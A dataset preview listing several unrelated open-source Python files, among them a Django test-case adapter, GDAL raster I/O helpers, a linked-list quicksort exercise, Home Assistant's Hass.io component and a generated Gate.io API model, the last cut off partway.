text
stringlengths 2
999k
|
|---|
# coding=utf-8
#
# This file is part of Hypothesis, which may be found at
# https://github.com/HypothesisWorks/hypothesis-python
#
# Most of this work is copyright (C) 2013-2018 David R. MacIver
# (david@drmaciver.com), but it contains contributions by others. See
# CONTRIBUTING.rst for a full list of people who may hold copyright, and
# consult the git log if you need to determine who owns an individual
# contribution.
#
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
#
# END HEADER
import unittest
import django.test as dt
class HypothesisTestCase(object):
def setup_example(self):
self._pre_setup()
def teardown_example(self, example):
self._post_teardown()
def __call__(self, result=None):
testMethod = getattr(self, self._testMethodName)
if getattr(testMethod, u'is_hypothesis_test', False):
return unittest.TestCase.__call__(self, result)
else:
return dt.SimpleTestCase.__call__(self, result)
class TestCase(HypothesisTestCase, dt.TestCase):
pass
class TransactionTestCase(HypothesisTestCase, dt.TransactionTestCase):
pass
|
#! /usr/bin/env python
"""
Functions for IO, mostly wrapped around GDAL
Note: This was all written before RasterIO existed, which might be a better choice.
"""
import os
import subprocess
import numpy as np
from osgeo import gdal, gdal_array, osr
#Define drivers
mem_drv = gdal.GetDriverByName('MEM')
gtif_drv = gdal.GetDriverByName('GTiff')
vrt_drv = gdal.GetDriverByName("VRT")
#Default GDAL creation options
gdal_opt = ['COMPRESS=LZW', 'TILED=YES', 'BIGTIFF=IF_SAFER']
#gdal_opt += ['BLOCKXSIZE=1024', 'BLOCKYSIZE=1024']
#List that can be used for building commands
gdal_opt_co = []
[gdal_opt_co.extend(('-co', i)) for i in gdal_opt]
#Add methods to load ma from OpenCV, PIL, etc.
#These formats should be directly readable as np arrays
#Note: want to modify to import all bands as separate arrays in ndarray
#Unless the user requests a single band, or range of bands
#Check for file existence
def fn_check(fn):
"""Wrapper to check for file existence
Parameters
----------
fn : str
Input filename string.
Returns
-------
bool
True if file exists, False otherwise.
"""
return os.path.exists(fn)
def fn_check_full(fn):
"""Check for file existence
Avoids race condition, but slower than os.path.exists.
Parameters
----------
fn : str
Input filename string.
Returns
-------
status
True if file exists, False otherwise.
"""
status = True
if not os.path.isfile(fn):
status = False
else:
try:
open(fn)
except IOError:
status = False
return status
def fn_list_check(fn_list):
status = True
for fn in fn_list:
if not fn_check(fn):
print('Unable to find: %s' % fn)
status = False
return status
def fn_list_valid(fn_list):
print('%i input fn' % len(fn_list))
out_list = []
for fn in fn_list:
if not fn_check(fn):
print('Unable to find: %s' % fn)
else:
out_list.append(fn)
print('%i output fn' % len(out_list))
return out_list
#Wrapper around gdal.Open
def fn_getds(fn):
"""Wrapper around gdal.Open()
"""
ds = None
if fn_check(fn):
ds = gdal.Open(fn, gdal.GA_ReadOnly)
else:
print("Unable to find %s" % fn)
return ds
def fn_getma(fn, bnum=1):
"""Get masked array from input filename
Parameters
----------
fn : str
Input filename string
bnum : int, optional
Band number
Returns
-------
np.ma.array
Masked array containing raster values
"""
#Add check for filename existence
ds = fn_getds(fn)
return ds_getma(ds, bnum=bnum)
#Given input dataset, return a masked array for the input band
def ds_getma(ds, bnum=1):
"""Get masked array from input GDAL Dataset
Parameters
----------
ds : gdal.Dataset
Input GDAL Datset
bnum : int, optional
Band number
Returns
-------
np.ma.array
Masked array containing raster values
"""
b = ds.GetRasterBand(bnum)
return b_getma(b)
#Given input band, return a masked array
def b_getma(b):
"""Get masked array from input GDAL Band
Parameters
----------
b : gdal.Band
Input GDAL Band
Returns
-------
np.ma.array
Masked array containing raster values
"""
b_ndv = get_ndv_b(b)
#bma = np.ma.masked_equal(b.ReadAsArray(), b_ndv)
#This is more appropriate for float, handles precision issues
bma = np.ma.masked_values(b.ReadAsArray(), b_ndv)
return bma
def get_sub_dim(src_ds, scale=None, maxdim=1024):
"""Compute dimensions of subsampled dataset
Parameters
----------
ds : gdal.Dataset
Input GDAL Datset
scale : int, optional
Scaling factor
maxdim : int, optional
Maximum dimension along either axis, in pixels
Returns
-------
ns
Numper of samples in subsampled output
nl
Numper of lines in subsampled output
scale
Final scaling factor
"""
ns = src_ds.RasterXSize
nl = src_ds.RasterYSize
maxdim = float(maxdim)
if scale is None:
scale_ns = ns/maxdim
scale_nl = nl/maxdim
scale = max(scale_ns, scale_nl)
#Need to check to make sure scale is positive real
if scale > 1:
ns = int(round(ns/scale))
nl = int(round(nl/scale))
return ns, nl, scale
def fn_getma_sub(fn, bnum=1, scale=None, maxdim=1024., return_ds=False):
ds = gdal.Open(fn)
return ds_getma_sub(ds, bnum=bnum, scale=scale, maxdim=maxdim, return_ds=return_ds)
#Load a subsampled array
#Can specify scale factor or max dimension
#No need to load the entire dataset for stats computation
def ds_getma_sub(src_ds, bnum=1, scale=None, maxdim=1024., return_ds=False):
"""Load a subsampled array, rather than full resolution
This is useful when working with large rasters
Uses buf_xsize and buf_ysize options from GDAL ReadAsArray method.
Parameters
----------
ds : gdal.Dataset
Input GDAL Datset
bnum : int, optional
Band number
scale : int, optional
Scaling factor
maxdim : int, optional
Maximum dimension along either axis, in pixels
Returns
-------
np.ma.array
Masked array containing raster values
"""
#print src_ds.GetFileList()[0]
b = src_ds.GetRasterBand(bnum)
b_ndv = get_ndv_b(b)
ns, nl, scale = get_sub_dim(src_ds, scale, maxdim)
#The buf_size parameters determine the final array dimensions
b_array = b.ReadAsArray(buf_xsize=ns, buf_ysize=nl)
bma = np.ma.masked_values(b_array, b_ndv)
out = bma
if return_ds:
dtype = src_ds.GetRasterBand(1).DataType
src_ds_sub = gdal.GetDriverByName('MEM').Create('', ns, nl, 1, dtype)
gt = np.array(src_ds.GetGeoTransform())
gt[[1,5]] = gt[[1,5]]*scale
src_ds_sub.SetGeoTransform(list(gt))
src_ds_sub.SetProjection(src_ds.GetProjection())
b = src_ds_sub.GetRasterBand(1)
b.WriteArray(bma)
b.SetNoDataValue(b_ndv)
out = (bma, src_ds_sub)
return out
#Note: need to consolidate with warplib.writeout (takes ds, not ma)
#Add option to build overviews when writing GTiff
#Input proj must be WKT
def writeGTiff(a, dst_fn, src_ds=None, bnum=1, ndv=None, gt=None, proj=None, create=False, sparse=False):
"""Write input array to disk as GeoTiff
Parameters
----------
a : np.array or np.ma.array
Input array
dst_fn : str
Output filename
src_ds: GDAL Dataset, optional
Source Dataset to use for creating copy
bnum : int, optional
Output band
ndv : float, optional
Output NoData Value
gt : list, optional
Output GeoTransform
proj : str, optional
Output Projection (OGC WKT or PROJ.4 format)
create : bool, optional
Create new dataset
sparse : bool, optional
Output should be created with sparse options
"""
#If input is not np.ma, this creates a new ma, which has default filL_value of 1E20
#Must manually override with ndv
#Also consumes a lot of memory
#Should bypass if input is bool
from pygeotools.lib.malib import checkma
a = checkma(a, fix=False)
#Want to preserve fill_value if already specified
if ndv is not None:
a.set_fill_value(ndv)
driver = gtif_drv
#Currently only support writing singleband rasters
#if a.ndim > 2:
# np_nbands = a.shape[2]
# if src_ds.RasterCount np_nbands:
# for bnum in np_nbands:
nbands = 1
np_dt = a.dtype.name
if src_ds is not None:
#If this is a fn, get a ds
#Note: this saves a lot of unnecessary iolib.fn_getds calls
if isinstance(src_ds, str):
src_ds = fn_getds(src_ds)
#if isinstance(src_ds, gdal.Dataset):
src_dt = gdal.GetDataTypeName(src_ds.GetRasterBand(bnum).DataType)
src_gt = src_ds.GetGeoTransform()
#This is WKT
src_proj = src_ds.GetProjection()
#src_srs = osr.SpatialReference()
#src_srs.ImportFromWkt(src_ds.GetProjectionRef())
#Probably a cleaner way to handle this
if gt is None:
gt = src_gt
if proj is None:
proj = src_proj
#Need to create a new copy of the default options
opt = list(gdal_opt)
#Note: packbits is better for sparse data
if sparse:
opt.remove('COMPRESS=LZW')
opt.append('COMPRESS=PACKBITS')
#Not sure if VW can handle sparse tif
#opt.append('SPARSE_OK=TRUE')
#Use predictor=3 for floating point data
if 'float' in np_dt.lower() and 'COMPRESS=LZW' in opt:
opt.append('PREDICTOR=3')
#If input ma is same as src_ds, write out array using CreateCopy from existing dataset
#if not create and (src_ds is not None) and ((a.shape[0] == src_ds.RasterYSize) and (a.shape[1] == src_ds.RasterXSize) and (np_dt.lower() == src_dt.lower())):
#Should compare srs.IsSame(src_srs)
if not create and (src_ds is not None) and ((a.shape[0] == src_ds.RasterYSize) and (a.shape[1] == src_ds.RasterXSize) and (np_dt.lower() == src_dt.lower())) and (src_gt == gt) and (src_proj == proj):
#Note: third option is strict flag, set to false
dst_ds = driver.CreateCopy(dst_fn, src_ds, 0, options=opt)
#Otherwise, use Create
else:
a_dtype = a.dtype
gdal_dtype = np2gdal_dtype(a_dtype)
if a_dtype.name == 'bool':
#Set ndv to 0
a.fill_value = False
opt.remove('COMPRESS=LZW')
opt.append('COMPRESS=DEFLATE')
#opt.append('NBITS=1')
#Create(fn, nx, ny, nbands, dtype, opt)
dst_ds = driver.Create(dst_fn, a.shape[1], a.shape[0], nbands, gdal_dtype, options=opt)
#Note: Need GeoMA here to make this work, or accept gt as argument
#Could also do ds creation in calling script
if gt is not None:
dst_ds.SetGeoTransform(gt)
if proj is not None:
dst_ds.SetProjection(proj)
dst_ds.GetRasterBand(bnum).WriteArray(a.filled())
dst_ds.GetRasterBand(bnum).SetNoDataValue(float(a.fill_value))
dst_ds = None
def writevrt(out_csv,srs='EPSG:4326',x='field_1',y='field_2'):
"""
Write out a vrt to accompany a csv of points
"""
out_vrt = os.path.splitext(out_csv)[0]+'.vrt'
out_csv = os.path.split(out_csv)[-1]
f = open(out_vrt, 'w')
f.write('<OGRVRTDataSource>\n')
f.write(' <OGRVRTLayer name="%s">\n' % os.path.splitext(out_csv)[0])
f.write(' <SrcDataSource>%s</SrcDataSource>\n' % out_csv)
f.write(' <GeometryType>wkbPoint</GeometryType>\n')
f.write(' <LayerSRS>%s</LayerSRS>\n' % srs)
f.write(' <GeometryField encoding="PointFromColumns" x="%s" y="%s"/>\n' % (x, y))
f.write(' </OGRVRTLayer>\n')
f.write('</OGRVRTDataSource>\n')
f.close()
#Move to geolib?
#Look up equivalent GDAL data type
def np2gdal_dtype(d):
"""
Get GDAL RasterBand datatype that corresponds with NumPy datatype
Input should be numpy array or numpy dtype
"""
dt_dict = gdal_array.codes
if isinstance(d, (np.ndarray, np.generic)):
d = d.dtype
#This creates dtype from another built-in type
#d = np.dtype(d)
if isinstance(d, np.dtype):
if d.name == 'int8':
gdal_dt = 1
elif d.name == 'bool':
#Write out as Byte
gdal_dt = 1
else:
gdal_dt = list(dt_dict.keys())[list(dt_dict.values()).index(d)]
else:
print("Input must be NumPy array or NumPy dtype")
gdal_dt = None
return gdal_dt
def gdal2np_dtype(b):
"""
Get NumPy datatype that corresponds with GDAL RasterBand datatype
Input can be filename, GDAL Dataset, GDAL RasterBand, or GDAL integer dtype
"""
dt_dict = gdal_array.codes
if isinstance(b, str):
b = gdal.Open(b)
if isinstance(b, gdal.Dataset):
b = b.GetRasterBand(1)
if isinstance(b, gdal.Band):
b = b.DataType
if isinstance(b, int):
np_dtype = dt_dict[b]
else:
np_dtype = None
print("Input must be GDAL Dataset or RasterBand object")
return np_dtype
#Replace nodata value in GDAL band
def replace_ndv(b, new_ndv):
b_ndv = get_ndv_b(b)
bma = np.ma.masked_values(b.ReadAsArray(), b_ndv)
bma.set_fill_value(new_ndv)
b.WriteArray(bma.filled())
b.SetNoDataValue(new_ndv)
return b
def set_ndv(dst_fn, ndv):
dst_ds = gdal.Open(dst_fn, gdal.GA_Update)
for n in range(1, dst_ds.RasterCount+1):
b = dst_ds.GetRasterBand(1)
b.SetNoDataValue(ndv)
dst_ds = None
#Should overload these functions to handle fn, ds, or b
#Perhaps abstract, as many functions will need this functionality
def get_ndv_fn(fn):
ds = gdal.Open(fn, gdal.GA_ReadOnly)
return get_ndv_ds(ds)
#Want to modify to handle multi-band images and return list of ndv
def get_ndv_ds(ds, bnum=1):
b = ds.GetRasterBand(bnum)
return get_ndv_b(b)
#Return nodata value for GDAL band
def get_ndv_b(b):
"""Get NoData value for GDAL band.
If NoDataValue is not set in the band,
extract upper left and lower right pixel values.
Otherwise assume NoDataValue is 0.
Parameters
----------
b : GDALRasterBand object
This is the input band.
Returns
-------
b_ndv : float
NoData value
"""
b_ndv = b.GetNoDataValue()
if b_ndv is None:
#Check ul pixel for ndv
ns = b.XSize
nl = b.YSize
ul = float(b.ReadAsArray(0, 0, 1, 1))
#ur = float(b.ReadAsArray(ns-1, 0, 1, 1))
lr = float(b.ReadAsArray(ns-1, nl-1, 1, 1))
#ll = float(b.ReadAsArray(0, nl-1, 1, 1))
#Probably better to use 3/4 corner criterion
#if ul == ur == lr == ll:
if np.isnan(ul) or ul == lr:
b_ndv = ul
else:
#Assume ndv is 0
b_ndv = 0
elif np.isnan(b_ndv):
b_dt = gdal.GetDataTypeName(b.DataType)
if 'Float' in b_dt:
b_ndv = np.nan
else:
b_ndv = 0
return b_ndv
#Write out a recarray as a csv
def write_recarray(outfn, ra):
with open(outfn,'w') as f:
f.write(','.join([str(item) for item in ra.dtype.names])+'\n')
for row in ra:
f.write(','.join([str(item) for item in row])+'\n')
#Check to make sure image doesn't contain errors
def image_check(fn):
ds = gdal.Open(fn)
status = True
for i in range(ds.RasterCount):
ds.GetRasterBand(i+1).Checksum()
if gdal.GetLastErrorType() != 0:
status = False
return status
#Return number of CPUs
#Logical is "virtual" cpu count with hyperthreading
#Set to False for physical cpu count
def cpu_count(logical=True):
"""Return system CPU count
"""
if logical:
from multiprocessing import cpu_count
ncpu=cpu_count()
else:
import psutil
ncpu=psutil.cpu_count(logical=False)
return ncpu
def setstripe(dir, threads=cpu_count()):
#import socket
#if 'nasa' in socket.getfqdn():
#Better to use 'df -T' to determine filesystem of directory
#Can do this with psutil Python lib, but need to also find mount point of file
if dir is not None:
if 'lustre' in str(subprocess.check_output(['df','-T'])):
if os.path.exists(dir):
if threads is None:
threads = cpu_count()
cmd = ['lfs', 'setstripe', dir, '-c', str(threads)]
print(' '.join(cmd))
subprocess.call(cmd)
#This is a shared directory for files like LULC, used by multiple tools
#Default location is $HOME/data
#Can specify in ~/.bashrc or ~/.profile
#export DATADIR=$HOME/data
def get_datadir():
default_datadir = os.path.join(os.path.expanduser('~'), 'data')
datadir = os.environ.get('DATADIR', default_datadir)
if not os.path.exists(datadir):
os.makedirs(datadir)
return datadir
#Function to get files using urllib
#This works with ftp
def getfile(url, outdir=None):
"""Function to fetch files using urllib
Works with ftp
"""
fn = os.path.split(url)[-1]
if outdir is not None:
fn = os.path.join(outdir, fn)
if not os.path.exists(fn):
#Find appropriate urlretrieve for Python 2 and 3
try:
from urllib.request import urlretrieve
except ImportError:
from urllib import urlretrieve
print("Retrieving: %s" % url)
#Add progress bar
urlretrieve(url, fn)
return fn
#Function to get files using requests
#Works with https authentication
def getfile2(url, auth=None, outdir=None):
"""Function to fetch files using requests
Works with https authentication
"""
import requests
print("Retrieving: %s" % url)
fn = os.path.split(url)[-1]
if outdir is not None:
fn = os.path.join(outdir, fn)
if auth is not None:
r = requests.get(url, stream=True, auth=auth)
else:
r = requests.get(url, stream=True)
chunk_size = 1000000
with open(fn, 'wb') as fd:
for chunk in r.iter_content(chunk_size):
fd.write(chunk)
#Get necessary credentials to access MODSCAG products - hopefully this will soon be archived with NSIDC
def get_auth():
"""Get authorization token for https
"""
import getpass
from requests.auth import HTTPDigestAuth
#This binds raw_input to input for Python 2
input_func = input
try:
input_func = raw_input
except NameError:
pass
uname = input_func("MODSCAG Username:")
pw = getpass.getpass("MODSCAG Password:")
auth = HTTPDigestAuth(uname, pw)
#wget -A'h8v4*snow_fraction.tif' --user=uname --password=pw
return auth
def readcsv(fn):
"""
Wrapper to read arbitrary csv, check for header
Needs some work to be more robust, quickly added for demcoreg sampling
"""
import csv
#Check first line for header
with open(fn, 'r') as f:
reader = csv.DictReader(f)
hdr = reader.fieldnames
#Assume there is a header on first line, check
skiprows = 1
if np.all(f.isdigit() for f in hdr):
hdr = None
skiprows = 0
#Check header for lat/lon/z or x/y/z tags
#Should probably do genfromtxt here if header exists and dtype of cols is variable
pts = np.loadtxt(fn, delimiter=',', skiprows=skiprows, dtype=None)
return pts
|
# check if the list contains 1 or more nodes
def getLink(head):
temp = head
while temp is not None and temp.next is not None:
temp = temp.next
return temp
#initialize the pivot ,newHead and newLink to the partition function
def quickSortRec(head, link):
if head is None or head == link:
return head
newHead = None
newLink = None
pivot, newHead, newLink = partition(head, link, newHead, newLink)
if newHead != pivot:
temp = newHead
while temp.next != pivot:
temp = temp.next
temp.next = None
newHead = quickSortRec(newHead, temp)
temp = getLink(newHead)
temp.next = pivot
pivot.next = quickSortRec(pivot.next, newLink)
return newHead
#divide the entire list into two parts
#where the left of the pivot value will have the values less than pivot
# and right of the pivot value will have the vlaues greater than pivot
def partition(head, Link, newHead, newLink):
pivot = Link
prev = None
curr = head
end = pivot
while curr is not pivot:
if curr.data < pivot.data:
if newHead is None:
newHead = curr
prev = curr
curr = curr.next
else:
if prev:
prev.next = curr.next
temp = curr.next
curr.next = None
end.next = curr
end = curr
curr = temp
if newHead is None:
newHead = pivot
newLink = end
return pivot, newHead, newLink
#Driver's code
from collections import defaultdict
class Node:
def __init__(self,data):
self.data=data
self.next=None
class Llist:
def __init__(self):
self.head=None
def insert(self,data,tail):
node=Node(data)
if not self.head:
self.head=node
return node
tail.next=node
return node
def nodeID(head,dic):
while head:
dic[head.data].append(id(head))
head=head.next
def printList(head,dic):
while head:
if id(head) not in dic[head.data]:
print("Do'nt swap data, swap pointer/node")
return
print(head.data,end=' ')
head=head.next
if __name__ == '__main__':
t=int(input())
for i in range(t):
n=int(input())
arr=[int(x) for x in input().split()]
ll=Llist()
tail=None
for nodeData in arr:
tail=ll.insert(nodeData,tail)
dic=defaultdict(list) # dictonary to keep data and id of node
nodeID(ll.head,dic) # putting data and its id
resHead=quickSort(ll.head)
printList(resHead,dic) #verifying and printing
print()
|
"""Support for Hass.io."""
from datetime import timedelta
import logging
import os
import voluptuous as vol
from homeassistant.auth.const import GROUP_ID_ADMIN
from homeassistant.components.homeassistant import SERVICE_CHECK_CONFIG
import homeassistant.config as conf_util
from homeassistant.const import (
ATTR_NAME,
EVENT_CORE_CONFIG_UPDATE,
SERVICE_HOMEASSISTANT_RESTART,
SERVICE_HOMEASSISTANT_STOP,
)
from homeassistant.core import DOMAIN as HASS_DOMAIN, callback
from homeassistant.exceptions import HomeAssistantError
import homeassistant.helpers.config_validation as cv
from homeassistant.loader import bind_hass
from homeassistant.util.dt import utcnow
from .addon_panel import async_setup_addon_panel
from .auth import async_setup_auth_view
from .discovery import async_setup_discovery_view
from .handler import HassIO, HassioAPIError
from .http import HassIOView
from .ingress import async_setup_ingress_view
_LOGGER = logging.getLogger(__name__)
DOMAIN = "hassio"
STORAGE_KEY = DOMAIN
STORAGE_VERSION = 1
CONF_FRONTEND_REPO = "development_repo"
CONFIG_SCHEMA = vol.Schema(
{vol.Optional(DOMAIN): vol.Schema({vol.Optional(CONF_FRONTEND_REPO): cv.isdir})},
extra=vol.ALLOW_EXTRA,
)
DATA_HOMEASSISTANT_VERSION = "hassio_hass_version"
HASSIO_UPDATE_INTERVAL = timedelta(minutes=55)
SERVICE_ADDON_START = "addon_start"
SERVICE_ADDON_STOP = "addon_stop"
SERVICE_ADDON_RESTART = "addon_restart"
SERVICE_ADDON_STDIN = "addon_stdin"
SERVICE_HOST_SHUTDOWN = "host_shutdown"
SERVICE_HOST_REBOOT = "host_reboot"
SERVICE_SNAPSHOT_FULL = "snapshot_full"
SERVICE_SNAPSHOT_PARTIAL = "snapshot_partial"
SERVICE_RESTORE_FULL = "restore_full"
SERVICE_RESTORE_PARTIAL = "restore_partial"
ATTR_ADDON = "addon"
ATTR_INPUT = "input"
ATTR_SNAPSHOT = "snapshot"
ATTR_ADDONS = "addons"
ATTR_FOLDERS = "folders"
ATTR_HOMEASSISTANT = "homeassistant"
ATTR_PASSWORD = "password"
SCHEMA_NO_DATA = vol.Schema({})
SCHEMA_ADDON = vol.Schema({vol.Required(ATTR_ADDON): cv.slug})
SCHEMA_ADDON_STDIN = SCHEMA_ADDON.extend(
{vol.Required(ATTR_INPUT): vol.Any(dict, cv.string)}
)
SCHEMA_SNAPSHOT_FULL = vol.Schema(
{vol.Optional(ATTR_NAME): cv.string, vol.Optional(ATTR_PASSWORD): cv.string}
)
SCHEMA_SNAPSHOT_PARTIAL = SCHEMA_SNAPSHOT_FULL.extend(
{
vol.Optional(ATTR_FOLDERS): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(ATTR_ADDONS): vol.All(cv.ensure_list, [cv.string]),
}
)
SCHEMA_RESTORE_FULL = vol.Schema(
{vol.Required(ATTR_SNAPSHOT): cv.slug, vol.Optional(ATTR_PASSWORD): cv.string}
)
SCHEMA_RESTORE_PARTIAL = SCHEMA_RESTORE_FULL.extend(
{
vol.Optional(ATTR_HOMEASSISTANT): cv.boolean,
vol.Optional(ATTR_FOLDERS): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(ATTR_ADDONS): vol.All(cv.ensure_list, [cv.string]),
}
)
MAP_SERVICE_API = {
SERVICE_ADDON_START: ("/addons/{addon}/start", SCHEMA_ADDON, 60, False),
SERVICE_ADDON_STOP: ("/addons/{addon}/stop", SCHEMA_ADDON, 60, False),
SERVICE_ADDON_RESTART: ("/addons/{addon}/restart", SCHEMA_ADDON, 60, False),
SERVICE_ADDON_STDIN: ("/addons/{addon}/stdin", SCHEMA_ADDON_STDIN, 60, False),
SERVICE_HOST_SHUTDOWN: ("/host/shutdown", SCHEMA_NO_DATA, 60, False),
SERVICE_HOST_REBOOT: ("/host/reboot", SCHEMA_NO_DATA, 60, False),
SERVICE_SNAPSHOT_FULL: ("/snapshots/new/full", SCHEMA_SNAPSHOT_FULL, 300, True),
SERVICE_SNAPSHOT_PARTIAL: (
"/snapshots/new/partial",
SCHEMA_SNAPSHOT_PARTIAL,
300,
True,
),
SERVICE_RESTORE_FULL: (
"/snapshots/{snapshot}/restore/full",
SCHEMA_RESTORE_FULL,
300,
True,
),
SERVICE_RESTORE_PARTIAL: (
"/snapshots/{snapshot}/restore/partial",
SCHEMA_RESTORE_PARTIAL,
300,
True,
),
}
@callback
@bind_hass
def get_homeassistant_version(hass):
"""Return latest available Home Assistant version.
Async friendly.
"""
return hass.data.get(DATA_HOMEASSISTANT_VERSION)
@callback
@bind_hass
def is_hassio(hass):
"""Return true if Hass.io is loaded.
Async friendly.
"""
return DOMAIN in hass.config.components
async def async_setup(hass, config):
"""Set up the Hass.io component."""
# Check local setup
for env in ("HASSIO", "HASSIO_TOKEN"):
if os.environ.get(env):
continue
_LOGGER.error("Missing %s environment variable.", env)
return False
host = os.environ["HASSIO"]
websession = hass.helpers.aiohttp_client.async_get_clientsession()
hass.data[DOMAIN] = hassio = HassIO(hass.loop, websession, host)
if not await hassio.is_connected():
_LOGGER.warning("Not connected with Hass.io / system to busy!")
store = hass.helpers.storage.Store(STORAGE_VERSION, STORAGE_KEY)
data = await store.async_load()
if data is None:
data = {}
refresh_token = None
if "hassio_user" in data:
user = await hass.auth.async_get_user(data["hassio_user"])
if user and user.refresh_tokens:
refresh_token = list(user.refresh_tokens.values())[0]
# Migrate old Hass.io users to be admin.
if not user.is_admin:
await hass.auth.async_update_user(user, group_ids=[GROUP_ID_ADMIN])
if refresh_token is None:
user = await hass.auth.async_create_system_user("Hass.io", [GROUP_ID_ADMIN])
refresh_token = await hass.auth.async_create_refresh_token(user)
data["hassio_user"] = user.id
await store.async_save(data)
# This overrides the normal API call that would be forwarded
development_repo = config.get(DOMAIN, {}).get(CONF_FRONTEND_REPO)
if development_repo is not None:
hass.http.register_static_path(
"/api/hassio/app", os.path.join(development_repo, "hassio/build"), False
)
hass.http.register_view(HassIOView(host, websession))
if "frontend" in hass.config.components:
await hass.components.panel_custom.async_register_panel(
frontend_url_path="hassio",
webcomponent_name="hassio-main",
sidebar_title="Hass.io",
sidebar_icon="hass:home-assistant",
js_url="/api/hassio/app/entrypoint.js",
embed_iframe=True,
require_admin=True,
)
await hassio.update_hass_api(config.get("http", {}), refresh_token)
async def push_config(_):
"""Push core config to Hass.io."""
await hassio.update_hass_timezone(str(hass.config.time_zone))
hass.bus.async_listen(EVENT_CORE_CONFIG_UPDATE, push_config)
await push_config(None)
async def async_service_handler(service):
"""Handle service calls for Hass.io."""
api_command = MAP_SERVICE_API[service.service][0]
data = service.data.copy()
addon = data.pop(ATTR_ADDON, None)
snapshot = data.pop(ATTR_SNAPSHOT, None)
payload = None
# Pass data to Hass.io API
if service.service == SERVICE_ADDON_STDIN:
payload = data[ATTR_INPUT]
elif MAP_SERVICE_API[service.service][3]:
payload = data
# Call API
try:
await hassio.send_command(
api_command.format(addon=addon, snapshot=snapshot),
payload=payload,
timeout=MAP_SERVICE_API[service.service][2],
)
except HassioAPIError as err:
_LOGGER.error("Error on Hass.io API: %s", err)
for service, settings in MAP_SERVICE_API.items():
hass.services.async_register(
DOMAIN, service, async_service_handler, schema=settings[1]
)
async def update_homeassistant_version(now):
"""Update last available Home Assistant version."""
try:
data = await hassio.get_homeassistant_info()
hass.data[DATA_HOMEASSISTANT_VERSION] = data["last_version"]
except HassioAPIError as err:
_LOGGER.warning("Can't read last version: %s", err)
hass.helpers.event.async_track_point_in_utc_time(
update_homeassistant_version, utcnow() + HASSIO_UPDATE_INTERVAL
)
# Fetch last version
await update_homeassistant_version(None)
async def async_handle_core_service(call):
"""Service handler for handling core services."""
if call.service == SERVICE_HOMEASSISTANT_STOP:
await hassio.stop_homeassistant()
return
try:
errors = await conf_util.async_check_ha_config_file(hass)
except HomeAssistantError:
return
if errors:
_LOGGER.error(errors)
hass.components.persistent_notification.async_create(
"Config error. See [the logs](/developer-tools/logs) for details.",
"Config validating",
f"{HASS_DOMAIN}.check_config",
)
return
if call.service == SERVICE_HOMEASSISTANT_RESTART:
await hassio.restart_homeassistant()
# Mock core services
for service in (
SERVICE_HOMEASSISTANT_STOP,
SERVICE_HOMEASSISTANT_RESTART,
SERVICE_CHECK_CONFIG,
):
hass.services.async_register(HASS_DOMAIN, service, async_handle_core_service)
# Init discovery Hass.io feature
async_setup_discovery_view(hass, hassio)
# Init auth Hass.io feature
async_setup_auth_view(hass, user)
# Init ingress Hass.io feature
async_setup_ingress_view(hass, host)
# Init add-on ingress panels
await async_setup_addon_panel(hass, hassio)
return True
|
# coding: utf-8
"""
Gate API v4
Welcome to Gate.io API APIv4 provides spot, margin and futures trading operations. There are public APIs to retrieve the real-time market statistics, and private APIs which needs authentication to trade on user's behalf. # noqa: E501
Contact: support@mail.gate.io
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from gate_api.configuration import Configuration
class MarginAccountBook(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'id': 'str',
'time': 'str',
'time_ms': 'int',
'currency': 'str',
'currency_pair': 'str',
'change': 'str',
'balance': 'str',
}
attribute_map = {
'id': 'id',
'time': 'time',
'time_ms': 'time_ms',
'currency': 'currency',
'currency_pair': 'currency_pair',
'change': 'change',
'balance': 'balance',
}
def __init__(
self,
id=None,
time=None,
time_ms=None,
currency=None,
currency_pair=None,
change=None,
balance=None,
local_vars_configuration=None,
): # noqa: E501
# type: (str, str, int, str, str, str, str, Configuration) -> None
"""MarginAccountBook - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._id = None
self._time = None
self._time_ms = None
self._currency = None
self._currency_pair = None
self._change = None
self._balance = None
self.discriminator = None
if id is not None:
self.id = id
if time is not None:
self.time = time
if time_ms is not None:
self.time_ms = time_ms
if currency is not None:
self.currency = currency
if currency_pair is not None:
self.currency_pair = currency_pair
if change is not None:
self.change = change
if balance is not None:
self.balance = balance
@property
def id(self):
"""Gets the id of this MarginAccountBook. # noqa: E501
Balance change record ID # noqa: E501
:return: The id of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this MarginAccountBook.
Balance change record ID # noqa: E501
:param id: The id of this MarginAccountBook. # noqa: E501
:type: str
"""
self._id = id
@property
def time(self):
"""Gets the time of this MarginAccountBook. # noqa: E501
Balance changed timestamp # noqa: E501
:return: The time of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._time
@time.setter
def time(self, time):
"""Sets the time of this MarginAccountBook.
Balance changed timestamp # noqa: E501
:param time: The time of this MarginAccountBook. # noqa: E501
:type: str
"""
self._time = time
@property
def time_ms(self):
"""Gets the time_ms of this MarginAccountBook. # noqa: E501
The timestamp of the change (in milliseconds) # noqa: E501
:return: The time_ms of this MarginAccountBook. # noqa: E501
:rtype: int
"""
return self._time_ms
@time_ms.setter
def time_ms(self, time_ms):
"""Sets the time_ms of this MarginAccountBook.
The timestamp of the change (in milliseconds) # noqa: E501
:param time_ms: The time_ms of this MarginAccountBook. # noqa: E501
:type: int
"""
self._time_ms = time_ms
@property
def currency(self):
"""Gets the currency of this MarginAccountBook. # noqa: E501
Currency changed # noqa: E501
:return: The currency of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._currency
@currency.setter
def currency(self, currency):
"""Sets the currency of this MarginAccountBook.
Currency changed # noqa: E501
:param currency: The currency of this MarginAccountBook. # noqa: E501
:type: str
"""
self._currency = currency
@property
def currency_pair(self):
"""Gets the currency_pair of this MarginAccountBook. # noqa: E501
Account currency pair # noqa: E501
:return: The currency_pair of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._currency_pair
